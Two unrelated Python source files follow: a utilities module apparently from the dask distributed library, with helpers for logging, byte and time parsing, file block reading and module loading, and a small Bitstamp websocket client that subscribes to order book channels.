except TypeError: # logger becomes None during process cleanup
pass
if pdb:
import pdb
pdb.set_trace()
raise
def silence_logging(level, root='distributed'):
"""
Force all existing loggers below *root* to the given level at least
(or keep the existing level if less verbose).
"""
if isinstance(level, str):
level = getattr(logging, level.upper())
old = None
logger = logging.getLogger(root)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
old = handler.level
handler.setLevel(level)
return old
@toolz.memoize
def ensure_ip(hostname):
""" Ensure that address is an IP address
Examples
--------
>>> ensure_ip('localhost')
'127.0.0.1'
>>> ensure_ip('123.123.123.123') # pass through IP addresses
'123.123.123.123'
"""
# Prefer IPv4 over IPv6, for compatibility
families = [socket.AF_INET, socket.AF_INET6]
for fam in families:
try:
results = socket.getaddrinfo(hostname,
1234, # dummy port number
fam, socket.SOCK_STREAM)
except socket.gaierror as e:
exc = e
else:
return results[0][4][0]
raise exc
tblib.pickling_support.install()
def get_traceback():
exc_type, exc_value, exc_traceback = sys.exc_info()
bad = [os.path.join('distributed', 'worker'),
os.path.join('distributed', 'scheduler'),
os.path.join('tornado', 'gen.py'),
os.path.join('concurrent', 'futures')]
while exc_traceback and any(b in exc_traceback.tb_frame.f_code.co_filename
for b in bad):
exc_traceback = exc_traceback.tb_next
return exc_traceback
def truncate_exception(e, n=10000):
""" Truncate exception to be about a certain length """
if len(str(e)) > n:
try:
return type(e)("Long error message",
str(e)[:n])
except Exception:
return Exception("Long error message",
type(e),
str(e)[:n])
else:
return e
if sys.version_info >= (3,):
# (re-)raising StopIteration is deprecated in 3.6+
exec("""def queue_to_iterator(q):
while True:
result = q.get()
if isinstance(result, StopIteration):
return result.value
yield result
""")
else:
# Returning non-None from generator is a syntax error in 2.x
def queue_to_iterator(q):
while True:
result = q.get()
if isinstance(result, StopIteration):
raise result
yield result
def _dump_to_queue(seq, q):
for item in seq:
q.put(item)
def iterator_to_queue(seq, maxsize=0):
q = Queue(maxsize=maxsize)
t = threading.Thread(target=_dump_to_queue, args=(seq, q))
t.daemon = True
t.start()
return q
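# Round-trip sketch (editor's note): the queue is fed from a background
# thread, so consuming it does not require the producer to be finished.
#
#     >>> q = iterator_to_queue(iter([1, 2, 3]))  # doctest: +SKIP
#     >>> q.get(), q.get(), q.get()               # doctest: +SKIP
#     (1, 2, 3)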
def tokey(o):
""" Convert an object to a string.
Examples
--------
>>> tokey(b'x')
'x'
>>> tokey('x')
'x'
>>> tokey(1)
'1'
"""
typ = type(o)
if typ is unicode or typ is bytes:
return o
else:
return str(o)
def validate_key(k):
"""Validate a key as received on a stream.
"""
typ = type(k)
if typ is not unicode and typ is not bytes:
raise TypeError("Unexpected key type %s (value: %r)"
% (typ, k))
def _maybe_complex(task):
""" Possibly contains a nested task """
return (istask(task) or
type(task) is list and any(map(_maybe_complex, task)) or
type(task) is dict and any(map(_maybe_complex, task.values())))
def convert(task, dsk, extra_values):
if type(task) is list:
return [convert(v, dsk, extra_values) for v in task]
if type(task) is dict:
return {k: convert(v, dsk, extra_values) for k, v in task.items()}
if istask(task):
return (task[0],) + tuple(convert(x, dsk, extra_values) for x in task[1:])
try:
if task in dsk or task in extra_values:
return tokey(task)
except TypeError:
pass
return task
def str_graph(dsk, extra_values=()):
return {tokey(k): convert(v, dsk, extra_values) for k, v in dsk.items()}
def seek_delimiter(file, delimiter, blocksize):
""" Seek current file to next byte after a delimiter bytestring
This seeks the file to the next byte following the delimiter. It does
not return anything. Use ``file.tell()`` to see location afterwards.
Parameters
----------
file: a file
delimiter: bytes
a delimiter like ``b'\n'`` or message sentinel
blocksize: int
Number of bytes to read from the file at once.
"""
if file.tell() == 0:
return
last = b''
while True:
current = file.read(blocksize)
if not current:
return
full = last + current
try:
i = full.index(delimiter)
file.seek(file.tell() - (len(full) - i) + len(delimiter))
return
except ValueError:
pass
last = full[-len(delimiter):]
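# Behaviour sketch (editor's note): position the file just past the next
# delimiter following the current offset.
#
#     >>> from io import BytesIO            # doctest: +SKIP
#     >>> f = BytesIO(b'abc\ndef\nghi')     # doctest: +SKIP
#     >>> _ = f.seek(5)                     # doctest: +SKIP
#     >>> seek_delimiter(f, b'\n', 2**16)   # doctest: +SKIP
#     >>> f.tell()                          # doctest: +SKIP
#     8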
def read_block(f, offset, length, delimiter=None):
""" Read a block of bytes from a file
Parameters
----------
f: file
File-like object supporting seek, read, tell, etc..
offset: int
Byte offset to start read
length: int
Number of bytes to read
delimiter: bytes (optional)
Ensure reading starts and stops at delimiter bytestring
If using the ``delimiter=`` keyword argument we ensure that the read
starts and stops at delimiter boundaries that follow the locations
``offset`` and ``offset + length``. If ``offset`` is zero then we
start at zero. The bytestring returned WILL include the
terminating delimiter string.
Examples
--------
>>> from io import BytesIO # doctest: +SKIP
>>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP
>>> read_block(f, 0, 13) # doctest: +SKIP
b'Alice, 100\\nBo'
>>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP
b'Alice, 100\\nBob, 200\\n'
>>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP
b'Bob, 200\\nCharlie, 300'
"""
if delimiter:
f.seek(offset)
seek_delimiter(f, delimiter, 2**16)
start = f.tell()
length -= start - offset
f.seek(start + length)
seek_delimiter(f, delimiter, 2**16)
end = f.tell()
offset = start
length = end - start
f.seek(offset)
bytes = f.read(length)
return bytes
@contextmanager
def tmpfile(extension=''):
    extension = '.' + extension.lstrip('.')
    handle, filename = tempfile.mkstemp(extension)
    os.close(handle)
    os.remove(filename)
    try:
        yield filename
    finally:
        # Clean up even if the block raised
        if os.path.exists(filename):
            if os.path.isdir(filename):
                shutil.rmtree(filename)
            else:
                try:
                    os.remove(filename)
                except OSError:  # sometimes we can't remove a generated temp file
                    pass
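# Usage sketch (editor's note): yields a fresh filename; the file only
# exists if the body creates it, and is removed again on exit.
#
#     >>> with tmpfile('.json') as fn:    # doctest: +SKIP
#     ...     with open(fn, 'w') as f:
#     ...         _ = f.write('{}')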
def ensure_bytes(s):
""" Turn string or bytes to bytes
>>> ensure_bytes('123')
b'123'
>>> ensure_bytes(b'123')
b'123'
"""
if isinstance(s, bytes):
return s
if isinstance(s, memoryview):
return s.tobytes()
if isinstance(s, bytearray) or PY2 and isinstance(s, buffer): # noqa: F821
return bytes(s)
if hasattr(s, 'encode'):
return s.encode()
raise TypeError(
"Object %s is neither a bytes object nor has an encode method" % s)
def divide_n_among_bins(n, bins):
"""
>>> divide_n_among_bins(12, [1, 1])
[6, 6]
>>> divide_n_among_bins(12, [1, 2])
[4, 8]
>>> divide_n_among_bins(12, [1, 2, 1])
[3, 6, 3]
>>> divide_n_among_bins(11, [1, 2, 1])
[2, 6, 3]
>>> divide_n_among_bins(11, [.1, .2, .1])
[2, 6, 3]
"""
total = sum(bins)
acc = 0.0
out = []
for b in bins:
now = n / total * b + acc
now, acc = divmod(now, 1)
out.append(int(now))
return out
def mean(seq):
seq = list(seq)
return sum(seq) / len(seq)
if hasattr(sys, "is_finalizing"):
def shutting_down(is_finalizing=sys.is_finalizing):
return is_finalizing()
else:
_shutting_down = [False]
def _at_shutdown(l=_shutting_down):
l[0] = True
def shutting_down(l=_shutting_down):
return l[0]
atexit.register(_at_shutdown)
shutting_down.__doc__ = """
Whether the interpreter is currently shutting down.
For use in finalizers, __del__ methods, and similar; it is advised
to early bind this function rather than look it up when calling it,
since at shutdown module globals may be cleared.
"""
def open_port(host=''):
""" Return a probably-open port
There is a chance that this port will be taken by the operating system soon
after returning from this function.
"""
# http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def import_file(path):
""" Loads modules for a file (.py, .zip, .egg) """
directory, filename = os.path.split(path)
name, ext = os.path.splitext(filename)
names_to_import = []
tmp_python_path = None
if ext in ('.py',): # , '.pyc'):
if directory not in sys.path:
tmp_python_path = directory
names_to_import.append(name)
if ext == '.py': # Ensure that no pyc file will be reused
cache_file = cache_from_source(path)
with ignoring(OSError):
os.remove(cache_file)
if ext in ('.egg', '.zip', '.pyz'):
if path not in sys.path:
sys.path.insert(0, path)
if ext == '.egg':
import pkg_resources
pkgs = pkg_resources.find_distributions(path)
for pkg in pkgs:
names_to_import.append(pkg.project_name)
elif ext in ('.zip', '.pyz'):
names_to_import.append(name)
loaded = []
if not names_to_import:
logger.warning("Found nothing to import from %s", filename)
else:
invalidate_caches()
if tmp_python_path is not None:
sys.path.insert(0, tmp_python_path)
try:
for name in names_to_import:
logger.info("Reload module %s from %s file", name, ext)
loaded.append(reload(import_module(name)))
finally:
if tmp_python_path is not None:
sys.path.remove(tmp_python_path)
return loaded
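# Usage sketch (editor's note; the path and module name are hypothetical):
#
#     >>> import_file('/tmp/my_plugin.py')  # doctest: +SKIP
#     [<module 'my_plugin' from '/tmp/my_plugin.py'>]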
class itemgetter(object):
"""A picklable itemgetter.
Examples
--------
>>> data = [0, 1, 2]
>>> get_1 = itemgetter(1)
>>> get_1(data)
1
"""
__slots__ = ('index',)
def __init__(self, index):
self.index = index
def __call__(self, x):
return x[self.index]
def __reduce__(self):
return (itemgetter, (self.index,))
def format_bytes(n):
""" Format bytes as text
>>> format_bytes(1)
'1 B'
>>> format_bytes(1234)
'1.23 kB'
>>> format_bytes(12345678)
'12.35 MB'
>>> format_bytes(1234567890)
'1.23 GB'
>>> format_bytes(1234567890000)
'1.23 TB'
>>> format_bytes(1234567890000000)
'1.23 PB'
"""
if n > 1e15:
return '%0.2f PB' % (n / 1e15)
if n > 1e12:
return '%0.2f TB' % (n / 1e12)
if n > 1e9:
return '%0.2f GB' % (n / 1e9)
if n > 1e6:
return '%0.2f MB' % (n / 1e6)
if n > 1e3:
return '%0.2f kB' % (n / 1000)
return '%d B' % n
byte_sizes = {
'kB': 10**3,
'MB': 10**6,
'GB': 10**9,
'TB': 10**12,
'PB': 10**15,
'KiB': 2**10,
'MiB': 2**20,
'GiB': 2**30,
'TiB': 2**40,
'PiB': 2**50,
'B': 1,
'': 1,
}
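# Derive case-insensitive lookups and common aliases from the table above:
# lower-cased keys ('kb'), bare SI prefixes ('k', 'm', ...) from the
# non-binary units, and binary prefixes without the trailing 'b'
# ('ki', 'mi', ...).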
byte_sizes = {k.lower(): v for k, v in byte_sizes.items()}
byte_sizes.update({k[0]: v for k, v in byte_sizes.items() if k and 'i' not in k})
byte_sizes.update({k[:-1]: v for k, v in byte_sizes.items() if k and 'i' in k})
def parse_bytes(s):
""" Parse byte string to numbers
>>> parse_bytes('100')
100
>>> parse_bytes('100 MB')
100000000
>>> parse_bytes('100M')
100000000
>>> parse_bytes('5kB')
5000
>>> parse_bytes('5.4 kB')
5400
>>> parse_bytes('1kiB')
1024
>>> parse_bytes('1e6')
1000000
>>> parse_bytes('1e6 kB')
1000000000
>>> parse_bytes('MB')
1000000
"""
s = s.replace(' ', '')
if not s[0].isdigit():
s = '1' + s
for i in range(len(s) - 1, -1, -1):
if not s[i].isalpha():
break
index = i + 1
prefix = s[:index]
suffix = s[index:]
n = float(prefix)
multiplier = byte_sizes[suffix.lower()]
result = n * multiplier
return int(result)
timedelta_sizes = {
's': 1,
'ms': 1e-3,
'us': 1e-6,
'ns': 1e-9,
'm': 60,
'h': 3600,
'd': 3600 * 24,
}
tds2 = {
'second': 1,
'minute': 60,
'hour': 60 * 60,
'day': 60 * 60 * 24,
'millisecond': 1e-3,
'microsecond': 1e-6,
'nanosecond': 1e-9,
}
tds2.update({k + 's': v for k, v in tds2.items()})
timedelta_sizes.update(tds2)
timedelta_sizes.update({k.upper(): v for k, v in timedelta_sizes.items()})
def parse_timedelta(s, default='seconds'):
""" Parse timedelta string to number of seconds
Examples
--------
>>> parse_timedelta('3s')
3
>>> parse_timedelta('3.5 seconds')
3.5
>>> parse_timedelta('300ms')
0.3
>>> parse_timedelta(timedelta(seconds=3)) # also supports timedeltas
3
"""
if isinstance(s, timedelta):
return s.total_seconds()
if isinstance(s, Number):
s = str(s)
s = s.replace(' ', '')
if not s[0].isdigit():
s = '1' + s
for i in range(len(s) - 1, -1, -1):
if not s[i].isalpha():
break
index = i + 1
prefix = s[:index]
suffix = s[index:] or default
n = float(prefix)
multiplier = timedelta_sizes[suffix.lower()]
result = n * multiplier
if int(result) == result:
result = int(result)
return result
def asciitable(columns, rows):
"""Formats an ascii table for given columns and rows.
Parameters
----------
columns : list
The column names
rows : list of tuples
The rows in the table. Each tuple must be the same length as
``columns``.
"""
rows = [tuple(str(i) for i in r) for r in rows]
columns = tuple(str(i) for i in columns)
widths = tuple(max(max(map(len, x)), len(c))
for x, c in zip(zip(*rows), columns))
row_template = ('|' + (' %%-%ds |' * len(columns))) % widths
header = row_template % tuple(columns)
bar = '+%s+' % '+'.join('-' * (w + 2) for w in widths)
data = '\n'.join(row_template % r for r in rows)
return '\n'.join([bar, header, bar, data, bar])
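# Output sketch (editor's note):
#
#     >>> print(asciitable(['name', 'n'], [('Alice', 1), ('Bob', 2)]))  # doctest: +SKIP
#     +-------+---+
#     | name  | n |
#     +-------+---+
#     | Alice | 1 |
#     | Bob   | 2 |
#     +-------+---+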
if PY2:
def nbytes(frame, _bytes_like=(bytes, bytearray, buffer)): # noqa: F821
""" Number of bytes of a frame or memoryview """
if isinstance(frame, _bytes_like):
return len(frame)
elif isinstance(frame, memoryview):
if frame.shape is None:
return frame.itemsize
else:
return functools.reduce(operator.mul, frame.shape,
frame.itemsize)
else:
return frame.nbytes
else:
def nbytes(frame, _bytes_like=(bytes, bytearray)):
""" Number of bytes of a frame or memoryview """
if isinstance(frame, _bytes_like):
return len(frame)
else:
try:
return frame.nbytes
except AttributeError:
return len(frame)
def PeriodicCallback(callback, callback_time, io_loop=None):
"""
Wrapper around tornado.IOLoop.PeriodicCallback, for compatibility
with removal of the `io_loop` parameter in Tornado 5.0.
"""
if tornado.version_info >= (5,):
return tornado.ioloop.PeriodicCallback(callback, callback_time)
else:
return tornado.ioloop.PeriodicCallback(callback, callback_time, io_loop)
@contextmanager
def time_warn(duration, text):
start = time()
yield
end = time()
if end - start > duration:
print('TIME WARNING', text, end - start)
def json_load_robust(fn, load=json.load):
""" Reads a JSON file from disk that may be being written as we read """
while not os.path.exists(fn):
sleep(0.01)
for i in range(10):
try:
with open(fn) as f:
cfg = load(f)
if cfg:
return cfg
except (ValueError, KeyError): # race with writing process
pass
sleep(0.1)
def format_time(n):
""" format integers as time
>>> format_time(1)
'1.00 s'
>>> format_time(0.001234)
'1.23 ms'
>>> format_time(0.00012345)
'123.45 us'
>>> format_time(123.456)
'123.46 s'
"""
if n >= 1:
return '%.2f s' % n
if n >= 1e-3:
return '%.2f ms' % (n * 1e3)
return '%.2f us' % (n * 1e6)
class DequeHandler(logging.Handler):
""" A logging.Handler that records records into a deque """
_instances = weakref.WeakSet()
def __init__(self, *args, **kwargs):
n = kwargs.pop('n', 10000)
self.deque = deque(maxlen=n)
super(DequeHandler, self).__init__(*args, **kwargs)
self._instances.add(self)
def emit(self, record):
self.deque.append(record)
def clear(self):
"""
Clear internal storage.
"""
self.deque.clear()
@classmethod
def clear_all_instances(cls):
"""
Clear the internal storage of all live DequeHandlers.
"""
for inst in list(cls._instances):
inst.clear()
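# Usage sketch (editor's note): keep the most recent log records in memory
# for later inspection.
#
#     >>> handler = DequeHandler(n=100)                          # doctest: +SKIP
#     >>> logging.getLogger('distributed').addHandler(handler)   # doctest: +SKIP
#     >>> [r.getMessage() for r in handler.deque]                # doctest: +SKIP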
def fix_asyncio_event_loop_policy(asyncio):
"""
Work around https://github.com/tornadoweb/tornado/issues/2183
"""
class PatchedDefaultEventLoopPolicy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
"""Get the event loop.
This may be None or an instance of EventLoop.
"""
try:
return super().get_event_loop()
except RuntimeError:
# "There is no current event loop in thread"
loop = self.new_event_loop()
self.set_event_loop(loop)
return loop
asyncio.set_event_loop_policy(PatchedDefaultEventLoopPolicy())
def reset_logger_locks():
""" Python 2's logger's locks don't survive a fork event
https://github.com/dask/distributed/issues/1491
"""
for name in logging.Logger.manager.loggerDict.keys():
for handler in logging.getLogger(name).handlers:
handler.createLock()
# Only bother if asyncio has been loaded by Tornado
if 'asyncio' in sys.modules:
fix_asyncio_event_loop_policy(sys.modules['asyncio'])
def has_keyword(func, keyword):
if PY3:
return keyword in inspect.signature(func).parameters
else:
# https://stackoverflow.com/questions/50100498/determine-keywords-of-a-tornado-coroutine
if gen.is_coroutine_function(func):
func = func.__wrapped__
return keyword in inspect.getargspec(func).args
if lru_cache:
has_keyword = lru_cache(1000)(has_keyword)
# from bokeh.palettes import viridis
# palette = viridis(18)
palette = ['#440154', '#471669', '#472A79', '#433C84', '#3C4D8A', '#355D8C',
'#2E6C8E', '#287A8E', '#23898D', '#1E978A', '#20A585', '#2EB27C',
'#45BF6F', '#64CB5D', '#88D547', '#AFDC2E', '#D7E219', '#FDE724']
@toolz.memoize
def color_of(x, palette=palette):
h = md5(str(x).encode())
n = int(h.hexdigest()[:8], 16)
return palette[n % len(palette)]
def iscoroutinefunction(f):
if gen.is_coroutine_function(f):
return True
if sys.version_info >= (3, 5) and inspect.iscoroutinefunction(f):
return True
return False
|
client.py
|
import websocket
import json
from threading import Thread
import time
# Channel options: ['live_trades_[currency_pair]', 'live_orders_[currency_pair]', 'order_book_[currency_pair]', 'detail_order_book_[currency_pair]', 'diff_order_book_[currency_pair]']
class wsClient(object):
    def __init__(self, channels=None, url='wss://ws.bitstamp.net'):
        self.url = url
        self.channels = channels
        self.ws = None
        self.thread = None
    def _connect(self):
        if self.channels is None:
            self.channels = ['order_book_btcusd']
        self.ws = websocket.create_connection(self.url)
        # Bitstamp expects one bts:subscribe event per channel
        for channel in self.channels:
            params = {'event': 'bts:subscribe', 'data': {'channel': channel}}
            self.ws.send(json.dumps(params))
def start(self):
def _go():
self._connect()
self._listen()
self._disconnect()
self.stop = False
self.on_open()
self.thread = Thread(target=_go)
self.keepalive = Thread(target=self._keepalive)
self.thread.start()
    def _keepalive(self, interval=30):
        # Ping periodically so that idle connections are not dropped
        while self.ws.connected:
            self.ws.ping('keepalive')
            time.sleep(interval)
    def _listen(self):
        self.keepalive.start()
        while not self.stop:
            try:
                data = self.ws.recv()
                msg = json.loads(data)
            except Exception as e:
                self.on_error(e)
            else:
                self.on_message(msg)
    def _disconnect(self):
        try:
            if self.ws:
                self.ws.close()
        except websocket.WebSocketConnectionClosedException:
            pass
        finally:
            self.keepalive.join()
            self.on_close()
def on_open(self):
print('-- WebSocket Opened --')
def on_close(self):
print("\n-- WebSocket Closed --")
def on_message(self, data):
print(data)
    def on_error(self, msg):
print(msg)
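# Usage sketch (editor's note): subscribe to the BTC/USD order book and
# print messages for a few seconds. 'order_book_btcusd' follows the channel
# naming convention listed above.
if __name__ == '__main__':
    client = wsClient(channels=['order_book_btcusd'])
    client.start()
    try:
        time.sleep(10)
    finally:
        client.stop = True      # _listen exits after the next received message
        client.thread.join()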
|